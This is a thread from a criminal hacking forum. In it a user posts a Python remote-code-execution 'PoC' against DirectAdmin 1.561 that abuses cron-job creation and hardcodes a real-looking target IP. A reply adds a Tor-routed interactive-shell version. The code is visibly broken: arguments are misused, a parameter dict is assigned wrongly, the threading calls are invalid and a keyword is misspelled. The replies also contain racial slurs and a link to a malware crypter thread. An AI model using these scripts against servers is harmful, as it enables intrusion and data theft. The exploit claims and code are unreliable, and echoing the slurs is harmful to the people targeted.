DirectAdmin 1.561 RCE - Remote Code Execution PoC
by 303 - Tuesday September 24, 2024 at 09:29 PM
#1
Hello Everyone, today im posting a PoC Exploit i made today for DirectAdmin 1.561.
This PoC exploit is coded by @303 for BreachForums community.

This vulnerability allows an attacker to gain unauthorized access to the server, and execute arbitrary commands on the system.

Impact: The impact is critical, because an attacker can exfil all te data from the system or gain move to other networks doing pivoting.

Vulnerability Type; Remote Code execution

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC
## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561
## Impact: The attacker can execute remote commands, and gain unauthorized data from the server.
## PoC author: @303 / for breachforums.sb

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC ## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561 ## Impact: The attacker can execute remote commands, and gain unauthorized data from the server. ## PoC author: @303 / for breachforums.sb import requests import sys import threading if len(sys.argv) < 3:     print("Usage: python %s <target_url> <command>" % sys.argv[0])     sys.exit(1) target_url = "https://208.85.2.148:2222" command = sys.argv[2] # Send a GET request to the DirectAdmin target server response = requests.get(f"{target_url}/CMD_CRON_JOBS") print(response.text) # Construct a POST request payload with the command to be executed params = {     "action": "create",     "minute": "*",     "hour": "*",     "dayofmonth": "*",     "month": "*",     "dayofweek": "*",     "command": "command;",     "command_type": "exec",     "command_exec": command } # Send a POST request to the DirectAdmin target server response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params) print(response.text) # Function for DirectAdmin command execution RCE exploit def exploit(target_url, command):     try:         # Send a GET request to the DirectAdmin target server         response = requests.get(f"{target_url}/CMD_CRON_JOBS")         print(response.text)         # Construct a POST request payload with the command to be executed         params = {             "action": "create",             "minute": "*",             "hour": "*",             "dayofmonth": "*",             "month": "*",             "dayofweek": "*",             "command": "command;",             "command_type": "exec",             "command_exec": command         }         # Send a POST request to the DirectAdmin target server         response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)         print(response.text)     except Exception as e:         print("An error occurred: %s" % e)         sys.exit(1)         def threading_function(target_url, command):             exploit(target_url, command)             threading.main_thread(10).start()             threading.join()             print("Exploit completed successfully!")
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#2
(09-24-2024, 09:29 PM)303 Wrote: Hello Everyone, today im posting a PoC Exploit i made today for DirectAdmin 1.561.
This PoC exploit is coded by @303 for BreachForums community.

This vulnerability allows an attacker to gain unauthorized access to the server, and execute arbitrary commands on the system.

Impact: The impact is critical, because an attacker can exfil all te data from the system or gain move to other networks doing pivoting.

Vulnerability Type; Remote Code execution

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC
## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561
## Impact: The attacker can execute remote commands, and gain unauthorized data from the server.
## PoC author: @303 / for breachforums.sb

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC ## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561 ## Impact: The attacker can execute remote commands, and gain unauthorized data from the server. ## PoC author: @303 / for breachforums.sb import requests import sys import threading if len(sys.argv) < 3:     print("Usage: python %s <target_url> <command>" % sys.argv[0])     sys.exit(1) target_url = "https://208.85.2.148:2222" command = sys.argv[2] # Send a GET request to the DirectAdmin target server response = requests.get(f"{target_url}/CMD_CRON_JOBS") print(response.text) # Construct a POST request payload with the command to be executed params = {     "action": "create",     "minute": "*",     "hour": "*",     "dayofmonth": "*",     "month": "*",     "dayofweek": "*",     "command": "command;",     "command_type": "exec",     "command_exec": command } # Send a POST request to the DirectAdmin target server response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params) print(response.text) # Function for DirectAdmin command execution RCE exploit def exploit(target_url, command):     try:         # Send a GET request to the DirectAdmin target server         response = requests.get(f"{target_url}/CMD_CRON_JOBS")         print(response.text)         # Construct a POST request payload with the command to be executed         params = {             "action": "create",             "minute": "*",             "hour": "*",             "dayofmonth": "*",             "month": "*",             "dayofweek": "*",             "command": "command;",             "command_type": "exec",             "command_exec": command         }         # Send a POST request to the DirectAdmin target server         response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)         print(response.text)     except Exception as e:         print("An error occurred: %s" % e)         sys.exit(1)         def threading_function(target_url, command):             exploit(target_url, command)             threading.main_thread(10).start()             threading.join()             print("Exploit completed successfully!")

Good job bro , Congratulations Smile
Reply
#3
Nice work.

#Niggered
Crypt files/Crypt files .NET [x64/x86] Native x86 WinDef Bypass - 0/26:
https://breachforums.sb/Thread-MALWARE-C...26-Avcheck


Reply
#4
(09-24-2024, 09:56 PM)suspect Wrote:
(09-24-2024, 09:29 PM)303 Wrote: Hello Everyone, today im posting a PoC Exploit i made today for DirectAdmin 1.561.
This PoC exploit is coded by @303 for BreachForums community.

This vulnerability allows an attacker to gain unauthorized access to the server, and execute arbitrary commands on the system.

Impact: The impact is critical, because an attacker can exfil all te data from the system or gain move to other networks doing pivoting.

Vulnerability Type; Remote Code execution

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC
## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561
## Impact: The attacker can execute remote commands, and gain unauthorized data from the server.
## PoC author: @303 / for breachforums.sb

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC ## Vulnerability details: This vulnerability allows remote code execution on DirectAdmin 1.561 ## Impact: The attacker can execute remote commands, and gain unauthorized data from the server. ## PoC author: @303 / for breachforums.sb import requests import sys import threading if len(sys.argv) < 3:     print("Usage: python %s <target_url> <command>" % sys.argv[0])     sys.exit(1) target_url = "https://208.85.2.148:2222" command = sys.argv[2] # Send a GET request to the DirectAdmin target server response = requests.get(f"{target_url}/CMD_CRON_JOBS") print(response.text) # Construct a POST request payload with the command to be executed params = {     "action": "create",     "minute": "*",     "hour": "*",     "dayofmonth": "*",     "month": "*",     "dayofweek": "*",     "command": "command;",     "command_type": "exec",     "command_exec": command } # Send a POST request to the DirectAdmin target server response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params) print(response.text) # Function for DirectAdmin command execution RCE exploit def exploit(target_url, command):     try:         # Send a GET request to the DirectAdmin target server         response = requests.get(f"{target_url}/CMD_CRON_JOBS")         print(response.text)         # Construct a POST request payload with the command to be executed         params = {             "action": "create",             "minute": "*",             "hour": "*",             "dayofmonth": "*",             "month": "*",             "dayofweek": "*",             "command": "command;",             "command_type": "exec",             "command_exec": command         }         # Send a POST request to the DirectAdmin target server         response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)         print(response.text)     except Exception as e:         print("An error occurred: %s" % e)         sys.exit(1)         def threading_function(target_url, command):             exploit(target_url, command)             threading.main_thread(10).start()             threading.join()             print("Exploit completed successfully!")

Good job bro , Congratulations Smile
thanks nigger :Terry:

(09-24-2024, 10:28 PM)N1k7 Wrote: Nice work.

#Niggered

Thanks Nigga #Niggered
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#5
Thank you @303 !
Reply
#6
Hello @303

I've adjusted your code to only run over Tor for better OPSEC.

Great Work!!

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC ## Inspired by @303 ## PoC author: @viceCoolMan / for breachforums.sb import sys, os, requests class NotVulnerableBitch(Exception):    def __init__(self, message):       self.message = f"{message}, Not Vulnerable Bitch!"       super().__init__(self.message) class DirectAdmin_RCE:    def __init__(self, url: str = "https://localtoast:2222", commandHistoryFile: str = None):       self.url: str = url       self.commandHistoryFile: str = ""       self.headers: dict = {"User-Agent":"Mozilla/5.0 (Linux; Android 15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.86 Mobile Safari/537.36","Content-type":"application/x-www-form-urlencoded"}       self.params: dict = {          "action": "create",          "minute": "*",          "hour": "*",          "dayofmonth": "*",          "month": "*",          "dayofweek": "*",          "command": "command;",          "command_type": "exec",          "command_exec": "temp_command"       }       self.tor_proxy: dict = {"http":"socks5h://127.0.0.1:9050", "https":"socks5h://127.0.0.1:9050"}       if commandHistoryFile and not os.path.exists(commandHistoryFile):          self.commandHistoryFile: str = commandHistoryFile          with open(self.commandHistoryFile, "w") as log:             log.write("New File")       print("Make sure Tor is running!")    def corvetSummerRCE(self, command: str) -> None:       rce_path = self.url+"/CMD_CRON_JOBS"       try:          temp_params = self.params["command_exec"] = command          r = requests.post(rce_path, headers = self.headers, proxy = self.tor_proxy, data = temp_params)          if not r.status_code == 200:             raise NotVulnerableBitch(rce_path)          print(r.text)          if self.commandHistoryFile:             with open(self.commandHistoryFile, "a") as log:                log.write(r.text)       except:          print("An error occured, Fish!")          sys.exit(1)    def shell(self):       while True:          cmd = input("[cls, q][=# >>>")          if cmd == "cls":             os.system("clear")          elif cmd == "q":             break          else:             self.corvetSummerRCE(cmd) def main():    if len(sys.argv) == 3:          what = DirectAdmin_RCE(sys.argv[1], sys.argv[2])          what.shell()    elif len(sys.argv) == 2:          what = DirectAdmin_RCE(sys.argv[1])          what.shell()    else:       print("Usage: python3 thisFile.py <url> <out_file>") if __name__ == "__main__":    main()
Ban reason: Self-Ban | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#7
(11-04-2024, 08:08 AM)viceCoolMan Wrote: Hello @303

I've adjusted your code to only run over Tor for better OPSEC.

Great Work!!

## Vulnerability: DirectAdmin 1.561 RCE - Remote Code Execution PoC ## Inspired by @303 ## PoC author: @viceCoolMan / for breachforums.sb import sys, os, requests class NotVulnerableBitch(Exception):    def __init__(self, message):       self.message = f"{message}, Not Vulnerable Bitch!"       super().__init__(self.message) class DirectAdmin_RCE:    def __init__(self, url: str = "https://localtoast:2222", commandHistoryFile: str = None):       self.url: str = url       self.commandHistoryFile: str = ""       self.headers: dict = {"User-Agent":"Mozilla/5.0 (Linux; Android 15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.86 Mobile Safari/537.36","Content-type":"application/x-www-form-urlencoded"}       self.params: dict = {          "action": "create",          "minute": "*",          "hour": "*",          "dayofmonth": "*",          "month": "*",          "dayofweek": "*",          "command": "command;",          "command_type": "exec",          "command_exec": "temp_command"       }       self.tor_proxy: dict = {"http":"socks5h://127.0.0.1:9050", "https":"socks5h://127.0.0.1:9050"}       if commandHistoryFile and not os.path.exists(commandHistoryFile):          self.commandHistoryFile: str = commandHistoryFile          with open(self.commandHistoryFile, "w") as log:             log.write("New File")       print("Make sure Tor is running!")    def corvetSummerRCE(self, command: str) -> None:       rce_path = self.url+"/CMD_CRON_JOBS"       try:          temp_params = self.params["command_exec"] = command          r = requests.post(rce_path, headers = self.headers, proxy = self.tor_proxy, data = temp_params)          if not r.status_code == 200:             raise NotVulnerableBitch(rce_path)          print(r.text)          if self.commandHistoryFile:             with open(self.commandHistoryFile, "a") as log:                log.write(r.text)       except:          print("An error occured, Fish!")          sys.exit(1)    def shell(self):       while True:          cmd = input("[cls, q][=# >>>")          if cmd == "cls":             os.system("clear")          elif cmd == "q":             break          else:             self.corvetSummerRCE(cmd) def main():    if len(sys.argv) == 3:          what = DirectAdmin_RCE(sys.argv[1], sys.argv[2])          what.shell()    elif len(sys.argv) == 2:          what = DirectAdmin_RCE(sys.argv[1])          what.shell()    else:       print("Usage: python3 thisFile.py <url> <out_file>") if __name__ == "__main__":    main()

good job, you adapted my code very good.
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#8
This PoC is for "DirectAdmin Daemon" or what server?
Reply
#9
Nice work mate....
Hidden Content
You must register or login to view this content.
Reply
#10
This exploit RCE still work for now?
“There is no good and evil, there is only power, and those too weak to seek it.”
- Voldemort
:grandwizzard_kkk:
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Sell] Calix GPON - Preauth RCE 0day ericki 1 276 06-29-2026, 06:41 AM
Last Post: johnmalkovich1202
  new wordpress website takeover vuln (video + poc ) zinzeur 312 27,280 03-28-2026, 02:43 AM
Last Post: toshi99
  [POC] Google OAuth "MultiLogin" endpoint 0-day Farfallaiero 106 13,203 02-10-2026, 03:34 PM
Last Post: birhikayemvar
  Cool Remote Patching ETW/Amsi PoC pepeloco 6 2,094 02-08-2026, 07:58 AM
Last Post: zeroday99
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc



 Users browsing this thread: 1 Guest(s)